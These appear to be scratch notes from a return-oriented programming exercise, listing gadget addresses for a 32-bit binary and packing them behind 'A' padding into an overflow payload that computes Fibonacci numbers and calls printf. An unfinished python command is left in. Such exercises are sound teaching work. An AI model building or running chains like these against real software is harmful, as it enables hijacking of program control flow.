//f[n-1] in eax, f[n-2] in edx

0x0806c74f : nop ; xor eax, eax ; ret
0x0809cb55 : xchg eax, edx ; ret
0x0808ec20 : mov eax, 1 ; ret

//repeat this
0x0809cb55 : xchg eax, edx ; ret
0x080691b3 : add eax, edx ; ret

0x080b7d26 : pop eax ; ret
0x804f1c0 ... address of printf
address of format string (points back to stack)




\x4f\xc7\x06\x08
\x55\xcb\x09\x08
\x20\xec\x08\x08

\x55\xcb\x09\x08
\xb3\x91\x06\x08

\x41\x41\x41\x41


\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41

\x4f\xc7\x06\x08\x55\xcb\x09\x08\x20\xec\x08\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08\x55\xcb\x09\x08\xb3\x91\x06\x08





"$(python -c 













---------------
r_new,r_old,temp

temp = r_old
temp += r_new
r_old = r_new
r_new = temp



//r_new in ecx, r_old in edx, temp in eax

0x0806c74f : nop ; xor eax, eax ; ret
0x0807a8fe : nop ; inc eax ; ret
0x0808ec20 : mov eax, 1 ; ret



// block to repear
0x08063f48 : push edx ; ret
0x080b7d26 : pop eax ; ret
0x080689a0 : add eax, ecx ; ret
0x080e1ab9 : push ecx ; ret
0x0806f0ba : pop edx ; ret
0x080b7cc6 : push eax ; ret
0x080de4d1 : pop ecx ; ret






